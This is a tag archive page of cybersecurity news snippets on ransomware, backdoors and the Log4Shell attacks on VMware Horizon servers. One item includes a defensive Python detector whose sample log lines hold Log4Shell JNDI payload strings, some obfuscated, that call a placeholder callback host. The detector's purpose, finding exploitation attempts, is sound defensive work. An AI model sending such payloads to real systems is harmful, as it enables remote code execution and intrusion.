Tag Archive for: backdoors

Cyber Security Today, Jan. 11, 2023 – Debate on ransomware attacks dropping continues, beware of long-hidden backdoors and lots of patches released


The debate on ransomware attacks dropping continues, beware of long-hidden backdoors and lots of patches released.

Welcome to Cyber Security Today. It’s Wednesday, January 11th, 2023. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.

Another entry in the debate on whether ransomware attacks are going up or down has been issued. Last week researchers at Emsisoft said the truth in the U.S. is hard to figure out because so many attacks aren’t publicly reported. This week researchers at Delinea released a report saying a survey it paid for suggests ransomware last year was down significantly from 2021. Of the 300 American IT decision-makers surveyed, 25 per cent said they were victims of ransomware in 2022. By comparison, 64 per cent of respondents said their firm was hit in 2021. Respondents also said budgets for ransomware defence dropped last year, although that could be because IT leaders are folding defences against ransomware into defences against all types of cyber attacks. More worrisome, the number of companies with incident response plans dropped to 71 per cent in 2022 from 94 per cent in 2021. There’s a link to the full report in the text version of this podcast.

Threat actors are known for installing backdoors on victims’ IT infrastructure to enable their attacks. That’s why scouring an entire IT environment after a successful breach of security controls is vital, to make sure no backdoors are left behind. The latest example comes in a report from researchers at U.K.-based S-RM Intelligence, who looked into an attack by the Lorenz ransomware gang. The gang’s entry point was a vulnerability in the victim’s Mitel VoIP phone system, but the backdoor it used had been installed five months before the ransomware was launched. One theory is that an initial access broker compromised the victim’s IT infrastructure, installed the backdoor and then notified the Lorenz group. Whatever the explanation, it’s another example of why continuously searching for backdoors, as well as patching vulnerabilities, is essential.

Ransom demands linked to denial of service attacks aren’t talked about a lot. However,…


The NSA Swears It Has ‘No Backdoors’ in Next-Gen Encryption


A group of human rights lawyers and investigators called on the Hague this week to bring what would be the first ever “cyber war crimes” charges. The group is urging the International Criminal Court to bring charges against the dangerous and destructive Russian hacking group known as Sandworm, which is run by Russia’s military intelligence agency GRU. Meanwhile, activists are working to block Russia from using satellites controlled by the French company Eutelsat to broadcast its state-run propaganda programming.

Researchers released findings this week that thousands of popular websites record data that users type into forms on the site before they hit the Submit button—even if the user closes the page without submitting anything. Google released a report on an in-depth security analysis it conducted with the chipmaker AMD to catch and fix flaws in specialty security processors used in Google Cloud infrastructure. The company also announced a slew of privacy and security features for its new Android 13 mobile operating system along with a vision for making them easier for people to understand and use.

The European Union is considering child protective legislation that would require scanning private chats, potentially undermining end-to-end encryption at a massive scale. Plus, defenders from the cybersecurity nonprofit BIO-ISAC are racing to protect the bioeconomy from digital threats, announcing a partnership this week with Johns Hopkins University Applied Physics Lab that will help fund pay-what-you-can incident response resources.

But wait, there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there.

The United States is completing development of a new generation of high-security encryption standards that will be robust in the current technical climate and are designed to be resistant to circumvention in the age of quantum computing. And while the National Security Agency contributed to the new standards’ creation, the agency says it has no special means of undermining the protections. Rob Joyce, the NSA’s director of cybersecurity, told Bloomberg this week, “There are…


Attackers Are Using Log4Shell Vulnerability to Deliver Backdoors to Virtual Servers



Internet security firm Sophos has released findings on how attackers are using the Log4Shell vulnerability to deliver backdoors and profiling scripts to unpatched VMware Horizon servers, paving the way for persistent access and future ransomware attacks.

A new technical paper, “Horde of Miner Bots and Backdoors Leveraged Log4J to Attack VMware Horizon Servers,” details the tools and techniques used to compromise the servers and deliver three different backdoors and four cryptominers.

The backdoors are possibly delivered by Initial Access Brokers.

Log4Shell is a remote code execution vulnerability in the Java logging component, Apache Log4J, which is embedded in hundreds of software products. It was reported and patched in December 2021. 
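Log4Shell is triggered by a lookup string of the form `${jndi:...}` reaching the logger, and attackers routinely nest other Log4j lookups inside it so that a flat search for `${jndi` misses the attempt. The detector below is an added example, not code from Sophos or from the Log4j project: it resolves nested lookups inside-out, using a deliberately small subset of Log4j’s substitution rules (`lower:`, `upper:` and the `${var:-default}` form, an assumption that covers the common obfuscations and nothing more), then scans constructed access-log lines for the resolved `jndi:` lookup and pulls out the callback target. The IP addresses and request paths in the sample lines are made up from documentation ranges.

```python
import re

# Innermost ${...} lookup: a body with no further "${" and no braces.
# A lone "$" is allowed inside so the "${::-$}{::-j}" splitting trick resolves.
_INNER = re.compile(r"\$\{((?:[^${}]|\$(?!\{))*)\}")
_JNDI = re.compile(r"jndi:", re.IGNORECASE)
_JNDI_TARGET = re.compile(r'jndi:([a-z]+://[^\s}"]+)', re.IGNORECASE)


def _resolve(body: str) -> str:
    """Resolve one innermost lookup body.

    Assumption: only the evasion-relevant subset of Log4j's substitutor is
    modelled here: ${lower:x}, ${upper:x} and ${var:-default}, where an
    undefined variable (e.g. ${::-j} or ${env:NaN:-j}) yields its default.
    Every other lookup (jndi:, date:, sys:, ...) is kept as plain text so the
    enclosing expression can still be resolved and the loop terminates.
    """
    head, _, rest = body.partition(":")
    prefix = head.lower()
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return body


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse innermost lookups repeatedly, inside-out, until nothing changes."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_access_log(lines):
    """Return one finding per line whose resolved form contains a jndi: lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        if "${" not in line:
            continue  # cheap pre-filter: no lookup syntax at all
        resolved = normalize(line)
        if _JNDI.search(resolved):
            target = _JNDI_TARGET.search(resolved)
            findings.append({
                "line": number,
                "target": target.group(1) if target else None,
                "resolved": resolved,
            })
    return findings


# Constructed Apache combined-format lines, not real traffic. The payloads are
# placed in the User-Agent field purely for illustration; any logged field will do.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jan/2022:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [17/Jan/2022:10:01:05 +0000] "GET /broker/xml HTTP/1.1" 200 128 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [17/Jan/2022:10:01:06 +0000] "GET /broker/xml HTTP/1.1" 200 128 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.5:1389/b}"',
    '198.51.100.9 - - [17/Jan/2022:10:01:07 +0000] "GET /broker/xml HTTP/1.1" 200 128 "-" "${${::-$}{::-j}ndi:rmi://203.0.113.5:1099/c}"',
    '192.0.2.11 - - [17/Jan/2022:10:02:00 +0000] "GET /app?tpl=${name} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(f"line {finding['line']}: callback to {finding['target']}")
```

The three malicious sample lines spell the `jndi` prefix three different ways, and only the first would match a literal `${jndi` search; the inside-out resolution is what makes the other two visible. The benign `${name}` on the last line resolves to plain text and is not reported. The extracted target is the attacker’s LDAP or RMI listener, which is the indicator to block and to hunt for in other logs.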

“Widely used applications such as VMware Horizon that are exposed to the internet and need to be manually updated, are particularly vulnerable to exploitation at scale,” said Sean Gallagher, senior security researcher at Sophos. “Sophos detections reveal waves of attacks targeting Horizon servers, starting in January, and delivering a range of backdoors and cryptominers to unpatched servers, as well as scripts to collect some device information.

Sophos believes that some of the backdoors may be delivered by Initial Access Brokers looking to secure persistent remote access to a high value target that they can sell on to other attackers, such as ransomware operators.”

The multiple attack payloads Sophos detected using Log4Shell to target vulnerable Horizon servers include:

  • Two legitimate remote monitoring and management tools, Atera agent and Splashtop Streamer, likely intended for malicious use as backdoors
  • The malicious Sliver backdoor 
  • The cryptominers z0Miner, JavaX miner, Jin and Mimu
  • Several PowerShell-based reverse shells that collect device and backup information

Sophos’ analysis revealed that Sliver is sometimes delivered together with Atera and PowerShell profiling scripts and is used to deliver the Jin and Mimu variants of the XMRig Monero miner botnet.

According to Sophos, the attackers are using several different approaches to infect targets. While some of…


Game source code sold online? Bloomberg renews claims of Chinese hardware backdoors. ICS advisories, notes. Bogus valentines. – The CyberWire
